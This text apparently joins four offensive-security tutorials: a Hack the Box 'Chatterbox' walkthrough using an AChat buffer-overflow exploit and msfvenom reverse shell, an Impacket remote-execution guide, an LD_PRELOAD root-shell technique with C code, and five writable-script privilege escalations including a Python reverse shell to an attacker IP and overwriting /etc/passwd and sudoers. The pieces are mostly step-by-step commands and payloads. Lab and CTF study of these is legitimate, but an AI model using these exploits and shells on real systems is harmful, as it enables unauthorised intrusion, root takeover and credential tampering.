Hack the Box Challenge: Chatterbox Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Chatterbox” which is categories as retired lab presented by Hack the Box for making online penetration practices. 

Level: Easy

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of chatterbox is 10.10.10.74 so let’s initiate with nmap port enumeration.

nmap -p1-10000 10.10.10.74

It has shown two ports are open but didn’t disclose running services through them.

Therefore we took help from Google and asked to look for any exploit related to these port as shown in the below image. So it put up two exploits related to Achat. First, we tried Metasploit exploit to compromise victim’s machine and almost successfully seized meterprerter session, but the session was getting died in few seconds.

Thus we choose the manual technique to compromise victim's machine by using exploit DB 36025.

Exploit 36025 is already stored inside Kali Linux and we have copied it on the Desktop.

cd Desktop

cp /usr/share/exploitdb/exploits/windows/remote/36025.py .

cat 36025.py

According to this python script, it is exploitable to Buffer overflow and highlighted msfvenom code is used to generate payload.

With the help of above script we execute following command to generate payload.

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.14.25 lport=1234 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Then copied the generated shellcode.

Now open the original 36025.py which you have saved on the desktop and paste above-copied shellcode here and then enter victim’s IP (10.10.10.74) as Server_address. Now start Netcat for reverse connection before running this script.

nc -lvp 1234

Now run your python script to lunch Buffer overflow attack on victim’s machine.

python 36025.py

BOOooOOMM!! Here we command shell of victim’s machine. Let’s finish this task by grabbing both flags.

Inside C:\Users\Alfred\Desktop we found user.txt flag used type “filename” command for reading this file.

cd Desktop

type user.txt

Great!! We got our 1^st flag successfully

Inside C:\Users \Administrator \Desktop I found the root.txt file and used type “filename” command for reading this file.

cd Desktop

type root.txt

But this file didn’t open due to less permission.

With help of following cacls command, we can observe the permission and can change the file's permissions where we had granted read operate to User: Alfred for the root.txt file.

cacls C:\Users \Administrator \Desktop 

cacls root.txt /g Alfred:r

type root.txt

Congratulation!!  2^nd Task is also completed

Beginner Guide to impacket Tool kit

While solving CTF challenges, serveral times I have to use the most amazing tool “Impacket” which is a collection of Python classes for working with network protocols, Infact some of its python classes are added to metasploit framework for taking remote session.

Table of content  

§  Introduction to Impacket

§  Lab set-up Requirement

§  Remote code Execution

§  SMB/MSRPC

§  Kerberos

§  Windows Secrets

§  Server Tools/MiTM Attacks

§  WMI

§  Known Vulnerabilities

§  MSSQL / TDS

§  File Formats

§  Others

Introduction to Impacket

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.
Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.

The following protocols are featured in Impacket:

§  Ethernet, Linux "Cooked" capture.

§  IP, TCP, UDP, ICMP, IGMP, ARP.

§  IPv4 and IPv6 Support.

§  NMB and SMB1, SMB2 and SMB3 (high-level implementations).

§  MSRPC version 5, over different transports: TCP, SMB/TCP, SMB/NetBIOS and HTTP.

§  Plain, NTLM and Kerberos authentications, using password/hashes/tickets/keys.

§  Portions/full implementation of the following MSRPC interfaces: EPM, DTYPES, LSAD, LSAT, NRPC, RRP, SAMR, SRVS, WKST, SCMR, DCOM, WMI

§  Portions of TDS (MSSQL) and LDAP protocol implementations.

Lab set-up Requirement

For the following practical we will require two systems,

A Windows Server with Domain Controller Configured

A Kali Linux

Here, in our lab scenario we have configured the following settings on our systems.

Windows Server Details

§  Domain: Pentest.local

§  User: Administrator

§  Password: Ignite@123

§  IP Address: 192.168.1.103

Now let’s install the Impacket tools from GitHub. Firstly, clone the git, and then install the Impacket as shown in the screenshot.

git clone https://github.com/CoreSecurity/impacket.git

cd impacket/

python setup.py install

This will install Impacket on your Kali Linux, now after installation let’s look at what different tools does Impacket have in its box.

cd impacket/examples

ls -la

There are several python classes as shown in the below image, in this article I had place all script in a same category which are preforming same task.

§  Remote code Execution : atexec.py, dcomexec.py, psexec.py, smbexec.py and wmiexec.py

§  SMB/MSRPC : getArch.py, ifmap.py, lookupsid.py, samrdump.py, services.py, netview.py, smbclient.py, opdump.py, rpcdump.py and  reg.py

§  Kerberos: GetTGT.py, GetST.py, GetPac.py, GetUserSPNs.py, GetNPUsers.py, ticketer.py and raiseChild.py

§  Windows Secret: secretsdump.py and mimikatz.py

§  Server Tools/MiTM Attacks: ntlmrelayx.py, karmaSMB.py and smbserver.py

§  WMI: wmiquery.py and wmipersist.py

§  Known Vulnerabilities: goldenPac.py, sambaPipe.py and sambaPipe.py

§  MSSQL / TDS: mssqlinstance.py and mssqlclient.py

§  File Formats: esentutl.py, ntfs-read.py and registry-read.py.

§  Others: GetADUsers.py, mqtt_check.py, rdp_check.py, sniffer.py, ping.py and ping6.py

In this tutorial guide we have elaborated two category (Remote Code Execution & SMB/MSRPC) in brief description.

Remote code Execution

atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.

./atexec.py raj/Administrator:Ignite@123@192.168.1.103 systeminfo

dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, Shell Windows and Shell Browser Window objects.

./dcomexec.py raj/Administrator:Ignite@123@192.168.1.103 dir

psexec.py: PSEXEC like functionality example using RemComSvc.

What is RemCom : RemCom is a small (10KB upx packed) remoteshell / telnet replacement that lets you execute processes on remote windows systems, copy files on remote systems, process there output and stream it back. It allows execution of remote shell commands directly with full interactive console without having to install any client software. On local machines it is also able to impersonate so can be used as a silent replacement for Runas command.

Source: https://github.com/kavika13/RemCom

./psexec.py raj/Administrator:Ignite@123@192.168.1.103 net user

smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.

./smbexec.py raj/Administrator:Ignite@123@192.168.1.103

wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.

./wmiexec.py raj/Administrator:Ignite@123@192.168.1.103 netstat

SMB/MSRPC

getArch.py: This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab) using a documented MSRPC feature and doesn't require any authentication at all.

./getArch.py -target 192.168.1.103

Note: Remember this trick will not work if the target system is running Samba.

ifmap.py: This script will bind to the target's MGMT interface to get a list of interface IDs. It will used that list on top of another list of interface UUIDs seen in the wild trying to bind to each interface and reports whether the interface is listed and/or listening.

./ifmap.py 192.168.1.103 135

lookupsid.py: A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.

./lookupsid.py raj/Administrator:Ignite@123@192.168.1.103

samrdump.py: An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.

./samrdump.py raj/Administrator:Ignite@123@192.168.1.103

If you will notice the image given below then you will observe that username along with uid and complete account details such password complexity and so on.

services.py: This script can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change.

./services.py raj/Administrator:Ignite@123@192.168.1.103 list

As you can observe from the given below image that it has dump list of all services running or stopped.

netview.py: Gets a list of the sessions opened at the remote hosts and keep track of them looping over the hosts found and keeping track of who logged in/out from remote servers.

./netview.py raj/Administrator -target 192.168.1.103

As we all know netview command identify the sessions opened at the remote hosts and keep track and from the given below image you can observe it is keep on tracking whenever target machine is active or logged off.

smbclient.py: A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It's an excellent example to see how to use impacket.smb in action.

./smbclient.py raj/Administrator:Ignite@123@192.168.1.103

From the given below image you can observe, it is showing all shares directory of the target machine.

opdump.py: This binds to the given hostname:port and MSRPC interface. Then, it tries to call each of the first 256 operation numbers in turn and reports the outcome of each call.

To run this command you have to give MSRPC interface and for that first you need to run ./ifmap.py command and then from its output result choose UUID for which you want to run opdump.py script.

./ifmap.py 192.168.1.103 135

./opdump.py 192.168.1.103 135 99FCFEC4-5260-101B-BBCB-00AA0021347A 0.0

rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well-known endpoints.

./rpcdump.py raj/Administrator:Ignite@123@192.168.1.103

reg.py: Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility.

./reg.py raj/Administrator:Ignite@123@192.168.1.103 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s

Reference Source: https://www.secureauth.com/labs/open-source-tools/impacket

Linux Privilege Escalation using LD_Preload

Hello friends, today we are going to discuss a new technique of privilege escalation by exploiting an environment variable “LD_Preload” but to practice this you must take some help from our previous article.

Table of contents

Introduction

Shared Libraries

Shared Libraries Names

LD_Preload

Lab setup

Post-Exploitation

Introduction

Shared Libraries

Shared libraries are libraries that are loaded by programs when they start. When a shared library is installed properly, all programs that start afterwards automatically use the new shared library. 

Shared Libraries Names

Every shared library has a special name called the ``soname''. The soname has the prefix ``lib'', the name of the library, the phrase ``.so'', followed by a period and a version number.

The dynamic linker can be run either indirectly by running some dynamically linked program or shared object. The programs ld.so and ld-linux.so* find and load the shared objects (shared libraries) needed by a program, prepare the program to run, and then run it. (read from here)

LD_Preload: It is an environment variable that lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload does. These are implemented by the loader /lib/ld-linux.so

For more information read from here.

Lab setup

It is important that logged user must have some sudo rights, therefore, we have given some sudo rights such as /usr/bin/find to be executed by sudo user. But apart from that, there is some Default specification where you can set an environment variable to work as sudo.

To do this follow below steps:

·         Open /etc/sudoers file by typing visudo

·         Now give some sudo rights to a user, in our case “raj” will be members of sudoers.

Raj          ALL=(ALL=ALL) NOPASSWD: /usr/bin/find

·         Then add following as default specification to set environment for LD_preload.

Defaults        env_keep += LD_PRELOAD

Post-Exploitation

To exploit such type of vulnerability we need to compromise victim’s machine at once then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh now for post exploitation type sudo -l command to detect it. And notice the highlighted environment variable will work as sudo.

Let’s generate a C-program file inside /tmp directory.

#include

#include

#include

void _init() {

unsetenv("LD_PRELOAD");

setgid(0);

setuid(0);

system("/bin/sh");

}

Then save it as shell.c inside /tmp.

As discussed let’s compile it to generate a shared object with .so extension likewise .dll file in Windows operating system and hence type following:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

ls -al shell.so

sudo LD_PRELOAD=/tmp/shell.so find

id

whoami

Yuppieeee!!!! We got the ROOT access.

Multiple Ways to Get root through Writable File

In Linux everything is a file, including directories and devices that have permissions to allow or restricted three operations i.e. read/write/execute. When admin set permission for any file, he should be aware of Linux users to whom he is going allow or restrict all three permissions.

In this article, we are going to discuss Linux privilege escalation through writable file/script. To know more about Linux system permission to read this article.

Table of content

·         Escalate root via writable script in 5 different methods

·         Copy /bin/sh inside /tmp

·         Set SUID bit for /bin/dash

·         Give ALL permission to logged user through sudoers

·         Set SUID bit for /bin/cp

·         Malicious code for reverse connection.

Let’s start!!!

Start yours attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then by using the following command, we can enumerate all binaries having writable permission.

find / -writable -type  f 2>/dev/null | grep -v "/proc/"

As you can observe that it has shown a python file which is stored inside /lib/log. When we explored that path we notice permission 777 for sanitizer.py

So here the following script was added by admin to cleanup all junk file from inside /tmp and these type of files depends upon specific time interval for executions.

Now if an attack identify such types of situation in victim’s machine then he can destroy his system by escalating root privileges in following ways

1^st Method

There so many methods to gain root access as in this method we copied /bin/sh inside /tmp and enabled SUID for /tmp/sh. It is quite simple, first, open the file through some editor for example nano sanitizer.py and replace “rm -r /tmp/*” from the following line as given below

os.system(‘cp /bin/sh /tmp/sh’)

os.system(‘chmod u+s /tmp/sh’)

After some time it will create an sh file inside /tmp directory having SUID permission and when you will run it you will give root access.

cd /tmp

ls

./sh

id

whoami

As you can confirm this from given below image.

2^nd Method

Similarly, you can also replace “rm -r /tmp/*” from the following line as given below.

os.system(‘chmod u+s /bin/dash)

After some time it will set SUID permission for /bin/dash and when you will run it will give root access.

/bin/dash

id

whoami

As you can confirm this from given below image

3^rd Method

In this method we have pasted python reverse shell connection code at place of rm -r /tmp/* and start netcat listener in a new terminal.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

And as said above after some time we got the reverse connection through netcat and root access.

nc -lvp 1234

id

whoami

As you can confirm this from given below image.

4^th Method

Another most interesting method is to give sudo right to the logged users by making him suoders file member. If you will notice below image then you can ensure that currently usre: wernerbrandes may not run sudo command.

Similarly you can also replace “rm -r /tmp/*” from following line as given below.

os.system(‘echo “wernerbrandes ALL=(ALL) NOPASSWD: ALL” > /etc/sudoers’)

And after some time, when you will type “sudo -l” command then you will notice, it becomes the member of sudo users. To take root access type “sudo bash” and enjoy the root access.

sudo -l

sudo bash

id

5^th Method

As we all know how much important role play by passwd in any linux -like system and if an attacker gets chance to modify this file, it becomes a dynamic way of privilege escalation.

Similarly, we will try something like this BUT with help of the writable script, here by using cat command we can etc/passwd file.

Here you can observe the highlighted entry for user: nemo records, as per my guessing UID:1000 & GID:1000 indicates it would be a member of admin group.

However, we want to edit nemo record to make him a member of root, therefore, select the whole content of etc/passwd and copy it and then paste into empty text file.

After then in a new terminal generate a salt password with help of openssl as shown and copy it.

openssl passwd -1 -salt abc 123

Now paste above-copied salt password at the place of "X" in the record entry of user nemo and also change previous UID&GID with 0:0 as shown in the given image. Once above said all steps are completed save the text file as “passwd" because when you will transfer this file to victim's machine it will overwrite the content of original passwd file.

cd Desktop

python -m SimpleHTTPServer 80

Now taking advantage of writable script replace “rm -r /tmp/*” from the following line as given below.

os.system(‘chmod u+s /bin/cp)

After some time it will enable SUID bit for /bin/cp to copy any file.

Now download your modified passwd file inside /tmp directory of victim's machine. Let’s check whether SUID bit gets enabled for /bin/cp or not with help of the following command after then copy modify passwd file into /etc/passwd with help of cp command which will overwrite the content of original passwd file.

cd /tmp

wget http://192.168.1.103/passwd

ls -al /bin/cp

cp passwd /etc/passwd

Now let confirm whether we have successfully manipulated the content of passwd file or not with help of the following command.

tail /etc/passwd

Wonderful!!! You can observe the following changes has now become the part of passwd file.

Now let take root access by executing following command:

su nemo

password 123

whoami

So today we have demonstrated how an attacker can lead to privilege escalation through the writable file.